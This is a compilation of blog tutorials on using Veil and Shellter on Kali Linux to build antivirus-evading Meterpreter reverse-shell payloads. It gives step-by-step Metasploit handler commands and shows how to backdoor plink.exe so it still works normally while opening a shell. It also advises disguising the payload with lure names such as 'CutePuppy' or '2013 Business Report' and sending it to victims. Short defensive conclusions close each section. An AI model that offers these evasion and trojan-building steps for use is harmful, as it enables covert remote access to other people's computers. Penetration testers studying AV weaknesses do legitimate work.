Anti-Virus Bypass with Veil on Kali Linux

One of the common hurdles of Ethical Hackers and Penetration Testers is bypassing anti-virus on target systems. Veil uses a Metasploit like interface to create a remote shell program that will bypass most Anti-Virus programs. A little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access.

In this article we will discuss how to install and run Veil on Kali Linux. Since the previous version of this article there have been several changes to Veil. The first is that it is now much easier to install and run Veil on Kali Linux. Veil directly supports Kali 2018 and installs by only running two commands. Another change is that Veil includes new payloads written for additional languages.

Read more about the updates at https://www.veil-framework.com/.

INSTALLING VEIL

Tool GitHub Page: https://github.com/Veil-Framework/Veil

Installing Veil 3.x on Kali 2018 is very simple:

Veil Evasion Kali Linux

The install will then run for a while as the dependency packages are installed. Reboot when finished.

STARTING VEIL

Now let’s look at using Veil.

  • In a terminal window, enter, “veil

AV bypass 1

Veil offers two tools, Evasion and Ordinance. We want to run Veil-Evasion.

  • Enter, “use 1

AV bypass Veil 2

The Veil title menu bar should change to “Veil-Evasion”.

USING VEIL-EVASION

The first thing to do is to list the available payloads using the “list” command.

  • Type “list” and then press enter.

AV bypass 3

PowerShell attacks are very popular, so let’s use a PowerShell payload. Just enter the “use” command and the number of the payload that you want. In this tutorial we will use the “powershell/meterpreter/rev_tcp.py” payload.

  1. Type, “use 22” and hit “enter”.

This will select the payload and present us with the following screen:

bypassing AV 4

If you look at the options, you will notice that it looks (and acts) very similar to using Metasploit modules. For this module we will just need to set the LHOST variable to our Kali system IP address.

2. Type, “set LHOST 192.168.1.39” and then hit “enter”.

3. Now enter, “options” to view the value that we just set:

bypassing AV 5

We will leave the LPORT set to the default value of 4444. Now we just need to generate our shellcode.

4. Enter, “generate

Veil will now generate the shellcode with the options that we chose.

5. Now we need to give our created file a filename or base name, I chose “CutePuppy”.

Veil-Evasion now has all that it needs and creates our shellcode file. We should see something like the following output:

bypassing AV 6

This screen shows what payload was used and also where the output file is located. In this instance, the file was placed in the “/var/lib/veil/output/source/” directory. When it is run on a Windows system, it will try to connect out to our Kali machine. But before we do, we will need to start a Metasploit handler to accept the connection. The handler runs in Metasploit and waits until the shell file (CutePuppy.bat in this instance) is opened. Once it is executed, it creates a remote shell between your Windows system and the Kali box.

GETTING A REMOTE SHELL

To create the remote handler, we will be using Metasploit. You can use the RC file generated by Veil, but I prefer to do it manually.

  1. Start the Metasploit Framework from the Kali Quick Start menu.
  2. Now set up the multi/handler using the following settings:
  • use multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.1.39
  • set LPORT 4444
  • exploit

This starts the multi handler on the Kali System:

bypassing AV 7

Now we just need the target computer to run the file that Veil generated.

3. Copy “CutePuppy.bat” to your Windows Desktop:

bypassing AV 8

4. Now, double click on the .bat file to run it.

Nothing appears to happen, but on your Kali system, you should see this:

bypassing AV 9

A reverse shell session!

5. Now if we type “shell”, we see that we do in fact have a complete remote shell:

bypassing AV 10

The big question is, can this bypass anti-virus? At the time of this writing I ran the PowerShell based CutePuppy.bat file on a fully updated Windows 10 system running an updated Anti-Virus and it did detect it as malicious.

Anti-Virus engines have become much better at detecting PowerShell based threats. There are other options you can use in Veil. I will not cover this step by step, but using the “c/meterpreter/rev_tcp.py” payload provided different results.

Generating it into a test.exe file:

bypassing AV 12

We have a shell:

bypassing AV 13

CONCLUSION

Hopefully this article has shown that you cannot trust in your Anti-Virus alone to protect you from online threats. Unfortunately, sometimes your network security depends on your users and what they allow to run. Instruct your users to be very leery of internet links and never open any attachments that they receive in unsolicited e-mails. Blocking certain file types from entering or leaving your network is also a good idea.

Finally, use a Network Security Monitoring system (and logs) to help track down what happened and what was compromised if the worst does happen.

Advertisements

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 5.1 shellcode injection tool! The latest version of Shellter for pentesters includes a “stealth” mode that retains the functionality of the original host program.

Shellter works by taking a legit Windows .exe file, adds the shell code to it and then does a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very pain free. In this tutorial I used Kali Linux 2.0 as the host and a Windows system as the target.

The new version of Shellter is not included in the repositories yet, so if you want the latest version you will need to download the zip file and install it manually.

So enough talk, let’s see it in action!

(Note: As always, never attempt to access a system that you do not have express written permission to do so. Doing so is illegal and you could end up in jail.)

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )

I saved the extracted folder to the /root/Desktop folder. You will need to make the shellter.exe file executable with the chmod command.

2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Change to the ‘/root/Desktop/shellter’ directory.

4. Start Shellter – type, “wine shellter.exe”

Shellter Kali 1

5. Enter “A” for automatic

6. At the PE Target Prompt, enter “plink.exe”

7. When prompted to enable stealth mode enter “Y”:
Shellter Kali 2

This new feature allows the backdoored file to still function as originally file. A big help for Red Team pentesters.

8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.

9. Enter your Kali IP address for LHOST.

10. Enter a port to use (I used 4545)

Shellter Kali 3

Shellter will then add PolyMorphic code and Obfuscate the file. When done you will see:
Shellter Kali 4

You will now have a ‘plink.exe’ (the shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter directory.

11. Now we need to start a listener service on the Kali system using the same settings from above:

  • start Metasploit (‘msfconsole’ in a terminal)
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 192.168.1.39
  • set lport 4545
  • exploit

Shellter Kali 5

12. Copy the ‘plink.exe’ file to the Windows system:
Shellter Kali 6

13. Now, in Windows, If you run plink.exe from the command prompt:

Shellter Kali 7

It lists the help information for the file, but does not trigger the remote shell yet. But if we actually use plink to connect to another system (a Raspberry Pi) as seen below:

Shellter Kali 8

Notice we get the Raspberry Pi ssh login prompt through Plink, but we also get a remote session to the Windows box:

Shellter Kali 9

We can run “sysinfo” to view information about the computer:

Shellter Kali 10

Success!

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!

If you enjoyed this tutorial, check out my new book, “Intermediate Security Testing with Kali Linux 2“.

Anti-Virus Bypass with Shellter 4.0 on Kali Linux

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program!

The latest version of Shellter for pentesters was revealed at B-Sides Lisbon earlier this month. Updates include increased obfuscation through a custom encoder and polymorphic decoder. Also this version saves a few steps by including the most common Meterpreter shells.

Shellter works by taking a legit Windows .exe file, adds the shell code to it and then does a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very pain free. In this tutorial I used the latest version of Kali Linux and a Windows 7 Virtual Machine.

So enough talk, let’s see it in action!

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )

**Note: the Kali repos apparently don’t contain the newest 4.0 version yet. To get the latest, instead of using ‘apt-get install shellter’, just download and extract the ZIP file to the “/etc/share” folder.

2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Start Shellter – ‘shellter’ from the terminal or use ‘wineconsole shelter’ from ‘/etc/share/shellter’ if you manually installed.

av bypass shellter 111

4. Choose ‘A’ for Automatic Mode

5. At the PE Target Prompt, enter “plink.exe”

6. When prompted for Payloads select “L” and then “1”

av bypass shellter 21

7. Next, enter the IP address of your Kali system (mine is 192.168.1.39)

8. And the port to use (I used 5555)

av bypass shellter 311

Shellter will obfuscate the code and crunch for a while. Then you should see:

Shellter Kali AV 411

Success!

9. Now we need to start a listener service on the Kali system using the same settings from above:

• start Metasploit (‘msfconsole’ in a terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
• exploit

10. Now that Kali is waiting for a connection. Copy our evil plink.exe command to the Windows 7 system and run it:

Shellter Kali AV 5

And we have a shell!

Shellter Kali AV 6

Compare the size of the backdoored exe to the original one. They are the exact same size! Now upload the backdoored exe to Virustotal and scan it for malicious content:

Shellter Kali AV 7

One (!) anti-virus engine detected it as malicious. And it was not a mainstream AV normally found in companies…

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!

(Post Updated 7/13/15 – Changed command from “wine shellter” to “wineconsole shellter” and updated pictures accordingly.)

Veil AV Bypass on Kali

One of the common hurdles of security and penetration testers is bypassing anti-virus on target systems. Veil uses a Metasploit like interface to create a remote shell program that will bypass most Anti-Virus programs.

A little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access.

Kali wasn’t originally installed on Kali, but has recently been added to the repositories. In this article we will discuss how to install and run Veil on Kali Linux.

Installing Veil

Veil was recently added to Kali, if typing “veil” at a terminal prompt does not start it, it may not be installed yet.

  • To install just type, “apt-get update && apt-get install veil”:
  •  Then to run the program open a terminal and just type, “veil”:

And this will bring you to the main menu:

Veil Kali 1

Using Veil

The first thing to do is to list the available payloads using the “list” command:

Veil Kali 2
The payloads are rated as to it’s success rate, so let’s try one of the PowerShell ones.

So just type the “use” command and the number of the payload. We will use the “powershell/VirtualAlloc” payload.

  • Type, “use 9”.

This will select the payload and present us with the following screen:

Veil Kali 3

  • We will just use the default values, so just type, “generate”.

Then you can choose to use Metasploit’s standard msvenom shellcode or choose your own. We will just choose the default, msfvenom.

  • Type “1” and enter:

Veil Kali 4

Next choose the type of shell; we will just use the default which is reverse_TCP. This means that their computer will connect back to us.

  • Just press “enter” to accept default shell payload:

Veil Kali 5

  • Next Veil will ask for the IP address of the host machine that you are using. Enter the IP address of your Kali machine and press enter.

Veil Kali 6

  • Then enter the Local port that you will be using. I chose to use port 4000:

Veil Kali 7

  • You will then be asked to enter any MSVenom options that you want to use, we won’t be using any, so just press enter to bypass them.

And that is it! Veil will then generate our shellcode with the options that we chose.

  • Now we need to give our created file a name. I chose “CutePuppy”

Okay, “Cutepuppy” sounds a little odd, but remember, you want the target to open the file that you are sending them, so a bit of Social Engineering is required.

If you know they like cute puppies, then our chosen file name is perfect. But you could also name it “2013 Business Report”, or “New Job Requirements”. Whatever you think would be the best.

Veil now has all that it needs and creates our booby-trapped file.

Veil Kali 9

Our file will be stored in the “/usr/share/veil/output/source/” directory.

Just take the created .bat file and send it to our target. When it is run, it will try to connect out to our machine.

We will now need to start a handler listener to accept the connection.

Getting a Remote Shell

To create the remote handler, we will be using Metasploit.

  • Start the Metasploit Framework from the menu or terminal (mfsconsole).
  • Now set up the multi/handler using the following screen:

Veil Kali 10

Be sure to put in the IP address for your machine and the port that you entered into Veil. They must match exactly.

Metasploit will then start the handler and wait for a connection:

Veil Kali 11

Now we just need the victim to run the file that we sent them.

Veil Kali 12

On the Windows 7 machine, if the file is executed, we will see this on our Kali system:

Veil Kali 13

A reverse shell session!

Then if we type “shell”, we see that we do in fact have a complete remote shell:

Veil Kali 14

Conclusion

This should help prove that you cannot trust in your Firewall and Anti-Virus alone to protect you from online threats. Unfortunately many times your network security depends on your users and what they allow to run.

Instruct your users to never run any programs or open any files that they get in an unsolicited e-mail.

Blocking certain file types from entering or leaving your network is also a good idea.

And finally, using a Network Security Monitoring system will help track down what happened and what was compromised if the worst does happen.